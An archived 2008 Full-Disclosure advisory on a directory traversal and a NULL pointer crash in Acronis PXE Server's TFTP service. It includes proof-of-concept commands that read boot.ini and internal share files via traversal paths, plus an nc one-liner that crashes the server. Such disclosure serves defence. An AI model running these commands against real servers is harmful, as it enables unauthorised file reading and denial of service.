[Full-disclosure] Directory traversal and NULL pointer in Acronis PXE Server 2.0.0.1076

From: Luigi Auriemma <aluigi@xxxxxxxxxxxxx>
Date: Mon, 10 Mar 2008 22:47:11 +0100

#######################################################################

Luigi Auriemma

Application: Acronis PXE Server
http://www.acronis.com/enterprise/products/snapdeploy/
Versions: <= 2.0.0.1076
Platforms: Windows
Bugs: A] directory traversal
B] NULL pointer
Exploitation: remote
Date: 08 Mar 2008
Author: Luigi Auriemma
e-mail: aluigi@xxxxxxxxxxxxx
web: aluigi.org

#######################################################################

1) Introduction
2) Bugs
3) The Code
4) Fix

#######################################################################

===============
1) Introduction
===============

The Acronis PXE Server is an essential component of Acronis Snap Deploy
Server, a deployment solution for automatically configuring all the
clients of the local network.

#######################################################################

=======
2) Bugs
=======

----------------------
A] directory traversal
----------------------

The PXE Server (pxesrv.exe) implements a TFTP server for allowing the
downloading of the bootstrap files (uploading is not allowed).
This service is vulnerable to a classical directory traversal and an
arbitrary path attacks which allow an attacker to download any file
from the local disks or the network shares.

---------------
B] NULL pointer
---------------

An incomplete TFTP request (anything which goes from the simple absence
of the option field to the usage of only the 2 bytes for the opcode)
causes the crashing of the PXE Server due to a NULL pointer access.

#######################################################################

===========
3) The Code
===========

A]
http://aluigi.org/testz/tftpx.zip

tftpx SERVER ..\../..\../boot.ini none
tftpx SERVER c:\boot.ini none
tftpx SERVER \\internal_host\documents\file.txt none

B]
send the bytes 00 01 to UDP port 69 of the server:

echo -n -e \x00\x01|nc SERVER 69 -v -v -u

#######################################################################

======
4) Fix
======

No fix

#######################################################################

---
Luigi Auriemma
http://aluigi.org

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: [Full-disclosure] NULL pointer in Acronis True Image Windows Agent 1.0.0.54
Next by Date: [Full-disclosure] Multiple vulnerabilities in ASG-Sentry 7.0.0
Previous by thread: [Full-disclosure] NULL pointer in Acronis True Image Windows Agent 1.0.0.54
Next by thread: [Full-disclosure] Multiple vulnerabilities in ASG-Sentry 7.0.0
Index(es):
- Date
- Thread

Relevant Pages

Re: DHCP restarting issues
... Your DHCP reboot every hour after configured option 67 for PXE server. ... The default configuration of PXE server assumes that the Microsoft DHCP ...
(microsoft.public.windows.server.sbs)
Directory traversal and NULL pointer in Acronis PXE Server 2.0.0.1076
... B] NULL pointer ... The Acronis PXE Server is an essential component of Acronis Snap Deploy ...
(Bugtraq)
Re: Boot-Disketten
... Wenn ja setz dir nen PXE Server auf. ... Für nen PXE Server brauchst du einen TFTP Server und einen DHCP Server ...
(de.comp.os.unix.linux.hardware)
Re: PXE Server
... > debian box as a pxe server to distribute these images to Windows clients. ...
(Debian-User)
Re: Using pointers across several network clients
... I have a server application which allocates different ... Is it a clean design if i'm directly using the pointer of the server data ... You can either do this by having each client ... X, thus, there are hidden data structures between them that we might ...
(comp.unix.programmer)